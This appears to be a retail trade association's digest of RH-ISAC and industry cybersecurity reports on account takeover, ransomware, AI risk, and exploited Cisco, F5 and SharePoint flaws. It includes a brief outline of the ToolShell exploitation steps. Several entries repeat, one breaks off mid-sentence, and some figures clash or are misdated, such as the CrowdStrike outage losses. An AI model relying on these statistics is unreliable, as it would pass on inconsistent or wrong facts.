What: Organised fraud groups are increasingly targeting retail accounts and loyalty programmes with advanced verification bypass and synthetic identity techniques, driving a surge in account takeovers and bot-driven attacks.

Why it is important: This escalation reflects a broader industry shift toward more targeted, sophisticated fraud, requiring retailers to strengthen layered defenses and real-time monitoring.

The Q1 2026 RH-ISAC benchmarks reveal a significant transformation in the account fraud landscape, with organized criminal groups leveraging advanced verification bypass and synthetic identity techniques to exploit retail, QSR, airline, and accommodation accounts. Retailers are now facing a surge in account takeovers, loyalty program abuse, and bot-driven attacks, particularly around high-demand products. The professionalisation of fraud services, including KYC and 2FA bypass, has made it increasingly difficult for traditional security measures to keep pace. Macroeconomic pressures, such as inflation and geopolitical instability, have further increased the value of stored credits and loyalty points, making them prime targets for sophisticated fraudsters. As legal and regulatory frameworks struggle to keep up with rapid technological advances, retailers are compelled to implement their own adaptive security strategies, focusing on layered defences, real-time intelligence sharing, and cross-functional collaboration to protect customer trust and business continuity.

IADS Notes: The Q1 2026 RH-ISAC findings align with recent industry reports, such as the May 2026 Retail Dive analysis documenting a shift toward targeted account takeovers and the March 2026 RH-ISAC emphasis on integrating cybersecurity with fraud prevention. The June 2025 Sainsbury’s loyalty programme breach illustrates the vulnerability of digital assets, while the March 2026 and April 2026 articles highlight how rapid AI adoption is outpacing security measures, exposing retailers to new risks. These developments collectively underscore the urgent need for adaptive, layered security and real-time monitoring to sustain customer trust and operational resilience.

Inside the account fraud economy: Q1 2026 benchmarks for retail

What: The rise of autonomous AI agents in retail is exposing the sector to novel cybersecurity risks that traditional frameworks cannot address.

Why it is important: Addressing these risks is critical for maintaining consumer trust and regulatory compliance in an increasingly digital retail environment.

The integration of agentic AI systems in retail is accelerating, promising significant operational efficiencies and new forms of customer engagement. However, this rapid technological shift is introducing a new class of cybersecurity risks that existing security frameworks are ill-equipped to manage. Autonomous AI agents, capable of making independent decisions and interacting with sensitive data, create vulnerabilities similar to those exploited by malware, increasing the potential for data breaches and system manipulation. As retailers embrace these advanced digital operators, the absence of tailored security protocols heightens the risk of regulatory non-compliance and erodes consumer trust. The sector faces mounting pressure to develop adaptive governance structures and real-time monitoring solutions that can address the unique challenges posed by agentic AI. Without robust security measures, the promise of AI-driven innovation in retail could be undermined by escalating threats, making it imperative for organisations to prioritise security as a foundational element of their digital transformation strategies.

IADS Notes: The rapid adoption of agentic AI in retail is fundamentally transforming operational efficiency and customer experience, but it is also exposing a widening gap between technological innovation and cybersecurity preparedness, as highlighted by RH-ISAC in March 2026. Autonomous AI agents now act in ways that closely resemble malware, introducing new risks that require real-time monitoring and robust governance, as detailed by Harvard Business Review in April 2026. Traditional security frameworks are proving inadequate, prompting urgent calls for new, tailored protocols to address the unique vulnerabilities of agentic AI, as emphasised by RH-ISAC in April 2026. Boards and executive leadership are under increasing pressure to strengthen oversight and ensure compliance with evolving regulations, given the escalating cyber threats from AI-driven innovation, as noted by Harvard Business Review in April 2026. The sector’s vulnerability is further underscored by The Robin Report in August 2025, which described how AI systems are susceptible to manipulation through prompt injection attacks, amplifying existing security risks and demanding a shift in how retailers approach digital risk management.

The missing security layer in agentic AI in retail

What: Retail CISOs are facing incremental budget growth, rising AI-driven risks, and expanding responsibilities amid persistent security maturity challenges.

Why it is important: The report’s insights confirm that budget constraints, skill shortages, and evolving threats are driving a strategic pivot toward intelligence sharing and robust incident response in retail.

The "CISO Benchmark 2026" report reveals that retail CISOs are navigating a landscape marked by modest increases in cybersecurity budgets, with spending growth often outpaced by the complexity and volume of threats. Artificial intelligence has emerged as both a critical tool and a significant risk, introducing new governance challenges and requiring fresh investment in oversight and controls. Despite technological advancements, staffing levels remain stable, with a focus on leveraging AI to enhance efficiency rather than reduce headcount. The role of the CISO has expanded beyond traditional IT security to encompass broader business risk domains, including third-party risk management, business continuity, and fraud prevention, reflecting the sector’s growing digital footprint and regulatory scrutiny. However, the maturity of security programs in retail continues to lag, with ongoing concerns about data leakage, insider threats, and insufficient controls. These persistent challenges underscore the need for integrated, resilient security strategies that can adapt to evolving threats and maintain consumer trust in an increasingly digital retail environment.

IADS Notes: The "CISO Benchmark 2026" report’s findings are strongly reinforced by recent industry analyses, which consistently highlight the escalating complexity and impact of cyber threats on the retail sector. The sharp rise in sophisticated attacks, as detailed in the March 2026 Unit 42 Global Incident Response Report, has made cybersecurity a core business risk, directly affecting profitability and customer trust. This urgency is echoed in the February 2026 Harvard Business Review, which documents the sector’s strategic shift toward collective resilience and industry-wide collaboration, moving beyond isolated prevention. The evolving responsibilities of CISOs, including the integration of fraud prevention and cybersecurity, are underscored by the March 2026 RH-ISAC article, reflecting the need for cross-functional coordination as digital transformation expands the attack surface. Intelligence sharing and collaborative engagement, as described in the January 2026 RH-ISAC Intelligence Trends Summary, are now central to effective threat response and operational continuity. Persistent challenges such as budget constraints, skill shortages, and lagging security maturity, highlighted in the August 2025 Retail Bulletin and July 2025 CISO Benchmark Report, further validate the report’s emphasis on the necessity of robust, integrated security strategies to sustain growth and maintain consumer trust.

CISO Benchmark Report 2026

What: The speed of AI deployment in retail and hospitality is outstripping the development of effective cybersecurity, increasing operational risks.

Why it is important: The trend underscores the increasing risk of sophisticated cyber threats as retailers prioritise rapid AI adoption over robust security.

Retail and hospitality sectors are experiencing a surge in AI adoption, with organizations leveraging advanced technologies to enhance operational efficiency and customer engagement. However, this rapid technological progress is creating a significant gap between innovation and security, as cybersecurity measures struggle to keep pace with the speed of AI deployment. The resulting vulnerabilities expose retailers to new and evolving threats, including sophisticated cyber attacks and novel risks such as prompt injection. Despite the clear benefits of AI-driven innovation, only a small fraction of retailers have achieved mature digital security, leaving the majority susceptible to breaches that can compromise both operations and customer trust. This imbalance is forcing industry leaders to urgently reassess their digital strategies, emphasising the need for robust governance, transparency, and integrated security protocols. As the sector continues to evolve, the challenge remains to balance the pursuit of technological advancement with the imperative to protect sensitive data and maintain operational resilience.

IADS Notes: The rapid adoption of AI in retail and hospitality is fundamentally transforming operational efficiency and customer experience, but it is also exposing a widening gap between technological innovation and cybersecurity readiness. As highlighted by RH-ISAC in March 2026, retailers are deploying AI at unprecedented speed, yet security protocols are struggling to keep pace, creating new vulnerabilities and operational risks. The Bain & Company Technology Report from September 2025 underscores that while 87% of AI-adopting retailers have seen revenue growth, only 18% possess mature digital core security, leaving the sector exposed to high-profile breaches. The Robin Report in August 2025 details how AI integration introduces novel threats such as prompt injection attacks, amplifying existing risks and demanding robust governance. The Financial Times in November 2025 emphasises that the explosive growth of AI-driven commerce is forcing retailers to recalibrate digital strategies and urgently address transparency and responsible governance. Meanwhile, The Retail Bulletin in August 2025 reports a surge in sophisticated cyber threats, with ransomware accounting for 30% of incidents and only a minority of retailers equipped with adequate security, highlighting the urgent need for integrated, proactive security strategies to sustain growth and customer trust.
The speed gap: Why AI in retail and hospitality is outpacing security

The speed gap: Why AI in retail and hospitality is outpacing security

What: Retailers globally faced a sharp rise in sophisticated cyber attacks in 2025, with significant operational and financial consequences.

Why it is important: These incidents demonstrate how cybersecurity has become a core business risk, directly impacting profitability and customer trust.

In 2025, the retail sector experienced a marked increase in sophisticated cyber attacks, resulting in substantial operational disruptions and financial losses. Ransomware and third-party breaches emerged as dominant threats, with average losses per ransomware incident reaching $1.4 million and operational downtimes averaging 72 hours. High-profile attacks on major retailers such as M&S, Co-op, and Harrods exposed critical vulnerabilities, with M&S alone suffering a £300 million profit impact and a £700 million market value loss. These events have driven up cyber insurance premiums and underscored the inadequacy of existing digital security frameworks, as only a small fraction of retailers possess mature core security. The frequency and severity of these incidents have transformed cybersecurity from a technical concern into a central business risk, compelling retailers to prioritize resilience, proactive monitoring, and robust incident response strategies to safeguard both operations and customer trust in an increasingly hostile digital environment.

IADS Notes: The 2026 Unit 42 Global Incident Response Report’s findings on the scale and sophistication of cyber incidents in retail are strongly echoed by recent industry analyses. RH-ISAC’s April 2025 report revealed that ransomware now accounts for 30% of all retail cyber incidents, with third-party breaches responsible for 41% and average losses per ransomware attack reaching $1.4 million, while operational downtimes average 72 hours. Retail Week’s August 2025 coverage of attacks on major UK retailers such as M&S, Co-op, and Harrods highlighted the sector’s acute vulnerabilities, with M&S alone suffering a £300 million profit impact and a £700 million market value loss, driving a 10% rise in cyber insurance premiums. The Retail Bulletin in August 2025 noted that only 18% of retailers possess mature digital core security, and high-profile breaches have resulted in significant financial and operational disruption. Inside Retail in May 2025 emphasised that coordinated attacks have transformed cybersecurity from an IT concern to a core business risk, directly affecting market value and customer trust. By July 2025, Retail Week reported that 80% of top UK retailers faced at least one critical cyber threat, underscoring the urgent need for improved visibility, proactive monitoring, and industry-wide resilience.

2026 Unit 42 Global Incident Response Report

What: CISOs are increasingly responsible for integrating cybersecurity and fraud prevention to protect retail organisations from evolving threats.

Why it is important: Coordinated cybersecurity and fraud prevention strategies are critical for protecting retail operations and customer trust, as seen in recent market developments.

As the retail sector faces a surge in sophisticated cyber threats and fraud, the role of the Chief Information Security Officer (CISO) is rapidly evolving. No longer limited to traditional IT security, CISOs are now expected to lead integrated efforts that bridge the gap between cybersecurity and fraud prevention. This shift is driven by the growing complexity of digital retail environments, where omnichannel strategies and digital transformation have expanded the attack surface and exposed new vulnerabilities. The consequences of fraud incidents are not only financial but also deeply impact brand reputation and customer trust. To address these risks, retailers are moving toward cross-functional collaboration, uniting IT, security, and fraud management teams to build comprehensive, layered defenses. Regulatory pressures and the need for real-time intelligence sharing further underscore the importance of a unified approach. By embracing this expanded mandate, CISOs are positioning themselves at the forefront of retail risk management, ensuring that organisations can respond swiftly and effectively to the evolving threat landscape.

IADS Notes: The convergence of cybersecurity and fraud prevention has become a defining challenge for the retail sector, as CISOs are increasingly called upon to address not only technical threats but also the broader spectrum of financial and reputational risks posed by fraud. Recent analyses, such as the February 2026 Harvard Business Review, underscore a strategic pivot from isolated prevention to collective resilience and industry-wide collaboration, reflecting the sector’s response to escalating cyber threats. The August 2025 Retail Bulletin and May 2025 BCG reports highlight how digital transformation and omnichannel expansion have expanded the attack surface, exposing critical gaps in cross-functional coordination between IT, security, and business teams. This fragmentation has left retailers vulnerable to sophisticated attacks, with incidents like the UNC3944 campaign in May 2025 demonstrating the urgent need for comprehensive, layered defences. Meanwhile, the October 2025 RH-ISAC initiative illustrates the sector’s shift toward intelligence-driven, regulatory-aligned fraud prevention strategies, emphasising the importance of coordinated action and real-time information sharing. Collectively, these developments signal a new era in which CISOs must lead integrated efforts to protect both operations and customer trust.

Why CISOs should  care about fraud

What: QR code phishing attacks are increasingly targeting retail environments, threatening both customer trust and operational security.

Why it is important: The rise in QR code phishing underscores the urgent need for enhanced cybersecurity measures and staff training in retail.

The growing integration of QR codes into retail operations has brought both convenience and new security challenges. As retailers leverage QR codes for payments, promotions, and customer engagement, cybercriminals are exploiting these tools to launch sophisticated phishing attacks. These attacks not only compromise sensitive customer data but also undermine trust in retail brands, potentially leading to significant reputational and financial damage. The rapid pace of digital transformation in retail has expanded the attack surface, making it imperative for retailers to adopt comprehensive cybersecurity strategies. Enhanced staff training and customer awareness are now essential to mitigate the risks associated with QR code phishing. Regulatory pressures are also mounting, as increased incidents of data breaches prompt calls for stricter compliance and data protection measures. Ultimately, the sector must balance the benefits of digital innovation with the need for robust security protocols to protect both operations and customer relationships.

IADS Notes: The proliferation of QR codes in retail, while enhancing customer engagement and streamlining payments, has simultaneously introduced new vectors for phishing and cyberattacks, as highlighted in recent industry analyses. The sector’s rapid digital transformation, detailed in The Retail Bulletin (August 2025), has expanded the attack surface, making retailers increasingly vulnerable to sophisticated threats such as QR code phishing. Inside Retail (May 2025) and RH-ISAC (April 2025) both underscore how these evolving tactics erode customer trust and expose systemic weaknesses, with phishing campaigns rising sharply and third-party breaches accounting for a significant portion of incidents. Retail Week (August 2025) further illustrates the operational and reputational fallout, noting a marked decline in customer recommendation rates following major breaches. In response, Google Cloud (May 2025) emphasises the necessity of comprehensive staff training and robust authentication protocols to counteract advanced social engineering and ransomware attacks. Collectively, these sources demonstrate that as retailers embrace digital tools like QR codes, they must also prioritise cybersecurity awareness, resilience, and regulatory compliance to safeguard both their operations and customer relationships.

Phishing on the edge of the web and mobile using QR codes

What: Intelligence sharing and collaborative engagement are transforming how retailers address cybersecurity threats and operational risks.

Why it is important:  This shift reflects a broader industry trend toward integrated security strategies and rapid response.

Retailers are increasingly recognising the value of intelligence sharing and collaborative engagement to combat the growing complexity of cybersecurity threats. The RH-ISAC Intelligence Trends Summary illustrates how information exchanges, requests for information, and industry surveys are providing actionable insights that help organisations identify and respond to emerging risks more effectively. As cyberattacks become more sophisticated, retailers are moving beyond isolated efforts, instead fostering partnerships and collective action to strengthen their defenses. This evolution is driving a shift from traditional prevention-focused models to integrated strategies that emphasise resilience, rapid recovery, and the protection of customer trust. Intelligence-driven decision-making is now influencing operational priorities, with many retailers investing in new technologies and cross-industry collaborations to stay ahead of adversaries. These developments underscore the sector’s commitment to safeguarding both business continuity and consumer confidence in an increasingly digital retail landscape.

IADS Notes: The RH-ISAC Intelligence Trends Summary is reinforced by findings from The Retail Bulletin in August 2025, which reported a surge in sophisticated cyber threats and emphasised the need for integrated security strategies and rapid recovery to maintain customer trust. RH-ISAC’s own April 2025 report highlighted the importance of intelligence-driven solutions and industry collaboration for improved threat detection and response. Retail Week’s coverage in August 2025 detailed the sector’s vulnerability to cyberattacks, especially through third-party providers, and stressed the necessity of coordinated responses. In July 2025, Retail Week documented Co-op’s strategic cybersecurity partnership following major breaches, illustrating the sector’s move toward collaborative protection. Inside Retail’s June 2025 analysis further demonstrated how resilience and rapid recovery have become competitive differentiators, marking a shift from prevention to holistic business continuity and customer trust.

RH-ISAC Intelligence Trends Summary: Q4 2025

What: Advanced malware targeting F5 BIG-IP devices is allowing attackers to pivot from edge appliances into internal retail networks, increasing the risk of operational disruption and data theft.

Why it is important: The exploitation of widely used network devices exposes critical vulnerabilities in retail infrastructure, demanding urgent investment in security and monitoring.

The recent exploitation of F5 BIG-IP appliances by the UNC5221 threat group, utilising the BRICKSTORM backdoor, represents a significant escalation in the cyber risks facing the retail sector. This sophisticated malware is engineered for stealth and persistence, establishing covert command channels that closely mimic legitimate web traffic and enabling attackers to move laterally from edge devices into internal networks. Such tactics make detection and response particularly challenging for retail cybersecurity teams, increasing the risk of data exfiltration, credential theft, and operational disruption. The theft of F5 source code and vulnerability data further amplifies the threat, as attackers can craft highly targeted exploits against retailers relying on these devices for critical network management. With 80% of leading UK retailers already exposed to critical cyber threats, and third-party breaches accounting for a substantial share of incidents, the sector faces mounting pressure to invest in integrated security strategies, rapid incident response, and continuous monitoring of all networked devices to safeguard operations and customer trust.

IADS Notes: RH-ISAC’s April 2025 report highlights the prevalence of supply chain and third-party breaches in retail, while The Retail Bulletin and Retail Week (August 2025) document the surge in sophisticated attacks exploiting network devices. Trustwave’s May 2025 analysis and Retail Week’s July 2025 findings further underscore the widespread vulnerabilities and the urgent need for robust, proactive security measures across the retail ecosystem.

Advanced malware targetting F5 BIG-IP appliances through backdoor

What: Holiday 2025 is marked by record retail sales, shifting consumer behaviours, and escalating cybersecurity threats impacting the retail, hospitality, and travel sectors.

Why it is important: Rising cyber threats and changing consumer behaviours during peak season reinforce the need for cross-sector collaboration and investment in digital infrastructure.

The 2025 holiday season presents a complex landscape for the retail industry, characterised by record-breaking sales figures and significant shifts in consumer behavior. While overall spending remains strong, with forecasts reaching up to $1.62 trillion, there is a notable divergence among age groups, as younger consumers, particularly Gen Z, are reducing their holiday budgets. This evolving consumer landscape is further complicated by the increasing integration of digital channels, with ecommerce and mobile commerce playing a pivotal role in driving sales. However, this digital transformation has also heightened the sector’s vulnerability to cyber threats, as evidenced by a surge in high-profile breaches and ransomware attacks targeting major retailers. The convergence of retail, hospitality, and travel sectors amplifies both the opportunities and risks, necessitating greater collaboration to address shared challenges. As retailers adapt to these dynamics, the focus on operational resilience, robust cybersecurity measures, and innovative customer engagement strategies becomes essential to sustaining growth and maintaining consumer trust during the most critical sales period of the year.

IADS Notes: Deloitte’s September 2025 forecast projects holiday retail sales to reach $1.62 trillion, while PwC’s September 2025 report highlights a generational divide with Gen Z reducing holiday spending. The Retail Bulletin and Retail Week, both in August 2025, detail a surge in cyberattacks and the urgent need for stronger digital infrastructure across the sector. Visa’s February 2025 analysis underscores the increasing convergence of retail, hospitality, and travel, emphasising the necessity of cross-sector collaboration and resilience to address evolving risks and consumer expectations.

2025 Holiday season cyber threat trends report

What: Cybercriminals are exploiting legitimate remote monitoring tools to infiltrate logistics networks, enabling large-scale cargo theft and disrupting retail supply chains.

Why it is important: The use of trusted IT tools for cyber-enabled theft exposes critical vulnerabilities in retail supply chains, demanding urgent investment in security and risk management.

A financially motivated threat group has been targeting the freight and logistics industry since June 2025, orchestrating a sophisticated campaign that merges cyber intrusion with physical cargo theft. By distributing legitimate remote monitoring and management (RMM) software such as ScreenConnect and SimpleHelp through spear-phishing and compromised load board accounts, attackers gain undetected access to logistics networks. Once inside, they manipulate core systems, delete legitimate freight bookings, and coordinate the fraudulent transport of high-value goods, mainly food and beverage products. This approach allows them to bypass traditional security measures, as RMM tools are often whitelisted within organizations. The campaign’s indiscriminate nature affects both small carriers and large supply chain providers, highlighting the vulnerability of the entire retail ecosystem. The blending of cyber and physical tactics demonstrates a deep understanding of logistics workflows and underscores the urgent need for retailers and their partners to reassess security protocols, invest in robust risk management, and foster cross-sector collaboration to protect inventory and maintain operational continuity.

IADS Notes: RH-ISAC’s April 2025 report details critical cyber threats to retail and hospitality, with third-party breaches accounting for 41% of incidents and average ransomware losses of $1.4 million. Retail Week and Inside Retail, in August and May 2025 respectively, highlight major attacks on supply chain providers and the resulting operational and financial impacts. The December 2024 ransomware attack on Blue Yonder further illustrates the widespread disruption cyber-enabled threats can cause across global retail logistics networks.

Cybercriminals exploit remote monitoring tools to infiltrate shipping and logistics networks

What: Cybercriminals are exploiting legitimate remote monitoring tools to infiltrate logistics networks, enabling large-scale cargo theft and disrupting retail supply chains.

Why it is important: The use of trusted IT tools for cyber-enabled theft exposes critical vulnerabilities in retail supply chains, demanding urgent investment in security and risk management.

A financially motivated threat group has been targeting the freight and logistics industry since June 2025, orchestrating a sophisticated campaign that merges cyber intrusion with physical cargo theft. By distributing legitimate remote monitoring and management (RMM) software such as ScreenConnect and SimpleHelp through spear-phishing and compromised load board accounts, attackers gain undetected access to logistics networks. Once inside, they manipulate core systems, delete legitimate freight bookings, and coordinate the fraudulent transport of high-value goods, mainly food and beverage products. This approach allows them to bypass traditional security measures, as RMM tools are often whitelisted within organizations. The campaign’s indiscriminate nature affects both small carriers and large supply chain providers, highlighting the vulnerability of the entire retail ecosystem. The blending of cyber and physical tactics demonstrates a deep understanding of logistics workflows and underscores the urgent need for retailers and their partners to reassess security protocols, invest in robust risk management, and foster cross-sector collaboration to protect inventory and maintain operational continuity.

IADS Notes: RH-ISAC’s April 2025 report details critical cyber threats to retail and hospitality, with third-party breaches accounting for 41% of incidents and average ransomware losses of $1.4 million. Retail Week and Inside Retail, in August and May 2025 respectively, highlight major attacks on supply chain providers and the resulting operational and financial impacts. The December 2024 ransomware attack on Blue Yonder further illustrates the widespread disruption cyber-enabled threats can cause across global retail logistics networks.

RH -ISAC Cybercriminals exploit remote monitoring tools to infiltrate shipping and logistics networks

What: Holiday 2025 is marked by record retail sales, shifting consumer behaviours, and escalating cybersecurity threats impacting the retail, hospitality, and travel sectors.

Why it is important: Rising cyber threats and changing consumer behaviours during peak season reinforce the need for cross-sector collaboration and investment in digital infrastructure.

The 2025 holiday season presents a complex landscape for the retail industry, characterised by record-breaking sales figures and significant shifts in consumer behavior. While overall spending remains strong, with forecasts reaching up to $1.62 trillion, there is a notable divergence among age groups, as younger consumers, particularly Gen Z, are reducing their holiday budgets. This evolving consumer landscape is further complicated by the increasing integration of digital channels, with ecommerce and mobile commerce playing a pivotal role in driving sales. However, this digital transformation has also heightened the sector’s vulnerability to cyber threats, as evidenced by a surge in high-profile breaches and ransomware attacks targeting major retailers. The convergence of retail, hospitality, and travel sectors amplifies both the opportunities and risks, necessitating greater collaboration to address shared challenges. As retailers adapt to these dynamics, the focus on operational resilience, robust cybersecurity measures, and innovative customer engagement strategies becomes essential to sustaining growth and maintaining consumer trust during the most critical sales period of the year.

IADS Notes: Deloitte’s September 2025 forecast projects holiday retail sales to reach $1.62 trillion, while PwC’s September 2025 report highlights a generational divide with Gen Z reducing holiday spending. The Retail Bulletin and Retail Week, both in August 2025, detail a surge in cyberattacks and the urgent need for stronger digital infrastructure across the sector. Visa’s February 2025 analysis underscores the increasing convergence of retail, hospitality, and travel, emphasising the necessity of cross-sector collaboration and resilience to address evolving risks and consumer expectations.

RH -ISAC 2025 Holiday season cyber threat trends report

The IADS attended RH-ISAC’s Trade Association Partners meeting, part of a new meeting series for trade association partners to collaborate on cybersecurity issues. Beginning from August 2025, this meeting takes place every two months. Partners discuss cybersecurity policy issues and updates, recent RH-ISAC reports and resources for members, and threat trend briefings. 
This document presents a brief recap of the RH-ISAC Trade Association Partners meeting.

RH-ISAC Trade Association Partners Meeting recap

What: Advanced malware targeting Cisco platforms has triggered emergency directives from US and UK authorities, highlighting critical risks for retailers relying on these systems.

Why it is important:  The coordinated response by CISA and NCSC reflects the growing regulatory and operational pressure on retailers to address evolving cyber threats and safeguard business continuity.

The coordinated emergency directives from CISA and the NCSC in response to active exploitation of zero-day vulnerabilities in Cisco networking devices mark a critical escalation in the cyber threat landscape for the retail sector. These vulnerabilities, exploited by sophisticated malware such as RayInitiator and LINE VIPER, expose retailers to heightened risks of network compromise, data exfiltration, and operational disruption. The urgency of the directives, which call for immediate disconnection of obsolete devices and rapid deployment of security updates, highlights the sector’s dependence on robust IT infrastructure and the severe consequences of both malicious attacks and technical failures. Recent industry data reveals that only a minority of retailers have mature digital core security, while high-profile breaches and outages have resulted in substantial financial losses and increased cyber insurance premiums. The retail industry’s response is shifting from basic prevention to comprehensive, resilience-driven strategies, including strategic partnerships and enhanced incident response, to address the evolving sophisticati

IADS Notes: The recent CISA and NCSC directives echo the findings from RH-ISAC in April 2025, which reported a surge in ransomware, phishing, and supply chain attacks, with third-party breaches accounting for 41% of incidents and average ransomware losses reaching $1.4 million. The catastrophic $5.4 billion Crowdstrike outage in March 2025, as detailed by Inside Retail, underscores the sector’s reliance on resilient IT infrastructure and rapid recovery. The Retail Bulletin’s August 2025 analysis found only 18% of retailers have mature digital core security, while high-profile breaches at M&S and Co-op, reported by Inside Retail in May 2025, have driven a 10% rise in cyber insurance premiums and forced a shift toward resilience-focused strategies. Retail Week’s July 2025 coverage of Co-op’s cybersecurity partnership highlights the industry’s move toward collaborative, proactive investment in cybersecurity.

CISA and NCSC release directives to address multiple Cisco platforms exploited by threat actors 

What: Microsoft identifies active exploitation of SharePoint's ToolShell zero-day vulnerability, enabling unauthenticated attackers to gain full remote control of retail servers and extract cryptographic secrets.

Why it is important: The timing of this threat is especially significant as retailers struggle with mounting cyber insurance costs and recovery from recent high-profile breaches, potentially creating a perfect storm for the industry.

Microsoft has uncovered widespread exploitation of a critical SharePoint vulnerability chain known as ToolShell (CVE-2025-53770), which enables unauthenticated attackers to compromise on-premises servers. The vulnerability, demonstrated publicly on social media, allows attackers to bypass authentication through a specific HTTP Referrer header manipulation during POST requests. Once access is gained, attackers can extract the SharePoint server's MachineKey configuration, including the crucial ValidationKey, which can then be used to craft valid payloads for arbitrary command execution without administrative credentials. This zero-day exploit poses a particular threat to retail and hospitality sectors, where SharePoint is extensively used for internal collaboration, document management, and customer-facing portals. The potential for complete compromise of critical internal data, intellectual property theft, and operational workflow disruption has prompted Microsoft and CISA to issue urgent warnings, with patches now available for affected versions.

IADS Notes: The emergence of the ToolShell SharePoint vulnerability in July 2025 represents a critical escalation in retail cybersecurity threats, following a year of unprecedented incidents. In April 2025, M&S's GBP 700 million market value loss from a cyber attack demonstrated how digital vulnerabilities can severely impact retail operations. The incident's connection to third-party suppliers mirrors the current SharePoint exploit's potential to compromise entire retail networks through a single entry point. This risk is particularly concerning given that March 2025 saw a single security update failure cause GBP 5.4 billion in losses across Fortune 500 companies. The retail sector's vulnerability to such threats has already driven a 10% increase in cyber insurance premiums by May 2025, while industry data from April 2025 shows ransomware accounting for 30% of retail security incidents. With 41% of breaches now occurring through third-party providers, this unauthenticated SharePoint exploit presents an unprecedented risk to retail organizations' operational integrity and data security.

RH-ISAC: Microsoft warns of active exploitation of SharePoint via ToolShell zero-day

What: Global CISO survey reveals critical security gaps in retail sector, with 82% of companies lacking strong digital core security maturity while facing increased ransomware and supply chain threats.

Why it is important: As recent attacks on major retailers demonstrate, the findings highlight an urgent need to strengthen cybersecurity foundations, with ransomware and supply chain vulnerabilities now directly impacting market valuations and customer trust.

The 2025 CISO Benchmark Report reveals significant vulnerabilities in retail cybersecurity infrastructure, with only 18% of companies achieving frontrunner status in digital core security maturity. The survey of 171 CISOs identifies ransomware (70%) and supply chain attacks (58%) as the primary security risks, while budget constraints (71%) and competing IT priorities (69%) emerge as major challenges. Business continuity has become the top cybersecurity priority, rising four places from 2024, reflecting the sector's growing focus on operational resilience. The report highlights a significant shift in security workforce composition, with contractors comprising 52% of InfoSec teams, rising to 60% among frontrunners. Despite these challenges, the sector shows promising developments in NIST Framework adoption, with scores rising 25% since 2024 and frontrunners outperforming peers by 12%. The findings emphasise the critical need for retailers to secure their digital core while balancing rapid technological advancement with robust security measures.

IADS Notes: The 2025 CISO Benchmark Report's findings are starkly validated by recent events in the retail sector. The report's emphasis on ransomware as the top security risk (70% of respondents) was demonstrated by the devastating Marks & Spencer attack in April 2025, which wiped £700 million off their market value. The importance of supply chain security, cited by 58% of respondents, was highlighted when both Harrods and Co-op suffered breaches through third-party vulnerabilities in May 2025, with Co-op's incident affecting up to 20 million customers. The report's revelation that 82% of companies lack strong security maturity aligns with the March 2025 Crowdstrike incident, where a single security update failure resulted in £5.4 billion in losses across Fortune 500 companies. These incidents have transformed the cyber insurance landscape, driving a 10% increase in premiums across the UK retail sector, while demonstrating the report's key finding that business continuity has become the top cybersecurity priority.

RH-ISAC: 2025 CISO Benchmark Report

What: Cybercriminals target Sainsbury's loyalty programme members through unauthorised access and point redemption scheme.

Why it is important: This incident reveals a critical security challenge for retailers as loyalty programmes evolve from simple point-collection systems to valuable digital assets requiring sophisticated protection measures.

Sainsbury's Nectar loyalty programme members are experiencing a significant surge in points theft, with one customer reporting the loss of two years' worth of accumulated points. This follows an earlier investigation that uncovered  GBP 63,000 worth of stolen Nectar points over a one-year period, prompting the implementation of a "lock" feature for all accounts. The primary attack method involves unauthorised access and rapid redemption of points at unfamiliar locations, suggesting the use of credential stuffing, phishing, or security vulnerability exploitation. While Nectar maintains that only a small proportion of accounts are affected and highlights protective measures like the "Spend Lock" feature, the recurring incidents indicate an ongoing targeted campaign against one of Europe's largest loyalty programmes. Security experts are particularly concerned about the timing of these attacks during peak accumulation periods like Christmas.

IADS Notes: The Sainsbury's Nectar points theft incident in June 2025 aligns with a broader pattern of sophisticated cyber attacks targeting retail loyalty programs. This follows May 2025's revelation of a complex cybercrime supply chain specifically targeting retail loyalty programmes, where criminals sell stolen credentials for as little as GBP 5. The timing is particularly significant as it coincides with industry data showing ransomware accounting for 30% of retail security incidents, with average losses reaching GBP 1.4 million per attack. The vulnerability of loyalty programs has become increasingly critical as retailers expand their digital engagement strategies, while the Co-op's recent cyber attack affecting 20 million customers demonstrates the scale of potential breaches in major retail loyalty systems.

RH-ISAC: Sainsbury’s rewards programme targeted by malicious actor for monetary gain

What: Account takeover attacks have evolved into a sophisticated cybercrime supply chain targeting retail loyalty programmes and e-commerce platforms, with criminals selling stolen credentials and session cookies for £5-20.

Why it is important: The emergence of this organized criminal marketplace directly threatens the digital transformation efforts of retailers, with recent incidents showing how stolen credentials can lead to millions in losses through loyalty point theft, fraudulent transactions, and damaged customer trust.

The cybercrime ecosystem has evolved into a sophisticated supply chain that systematically targets retail and hospitality businesses through account takeover (ATO) attacks. With an alarming 28% annual growth in exposed credentials, this underground economy operates through a well-structured network of initial access brokers, who sell stolen information and active session cookies for as little as £5. The threat is particularly acute for retail loyalty programmes, which often lack robust multi-factor authentication while containing valuable, cash-equivalent points. E-commerce platforms face similar vulnerabilities, as stored payment methods and customer preferences become lucrative targets for fraudsters. The impact extends beyond immediate financial losses, affecting customer trust and operational stability. Particularly concerning is the criminals' ability to bypass traditional security measures through session hijacking, where stolen cookies enable unauthorized access without triggering standard security alerts. To combat these threats, retailers must implement a layered defence strategy, including shorter cookie durations, proactive session monitoring, and adaptive authentication measures for high-risk accounts.

IADS Notes: The article's warnings about account takeover (ATO) threats are starkly validated by recent cyber incidents across the retail sector. In April 2025, Marks & Spencer fell victim to the Scattered Spider hacking group, resulting in a £700 million market value loss and highlighting how sophisticated cybercrime networks can paralyse major retailers. This was followed by attacks on Harrods and Co-op in May 2025, with the latter exposing data of 20 million customers, demonstrating the scale of potential breaches. The financial impact has been severe, with industry data from April 2025 showing ransomware accounting for 30% of retail security incidents and average losses reaching £1.4 million per attack. The ripple effect has transformed the cyber insurance landscape, driving a 10% increase in premiums across the UK retail sector. These incidents underscore the article's emphasis on the cybercrime supply chain, as demonstrated by the December 2024 Blue Yonder ransomware attack that affected over 3,000 retailers worldwide, showing how criminals can exploit interconnected retail systems for maximum impact.

Stolen logins, lost trust: The hidden supply chain behind account takeovers in retail & hospitality

What: A comprehensive analysis of cyber threats in retail reveals critical vulnerabilities across ransomware, phishing, and supply chain security, with third-party breaches accounting for 41% of reported incidents and average losses reaching USD 1.4 million per ransomware attack.

Why it is important: As retail operations become increasingly digitised and interconnected, understanding and addressing these cybersecurity vulnerabilities is crucial for protecting both business operations and customer trust in an industry that relies heavily on seamless digital transactions.

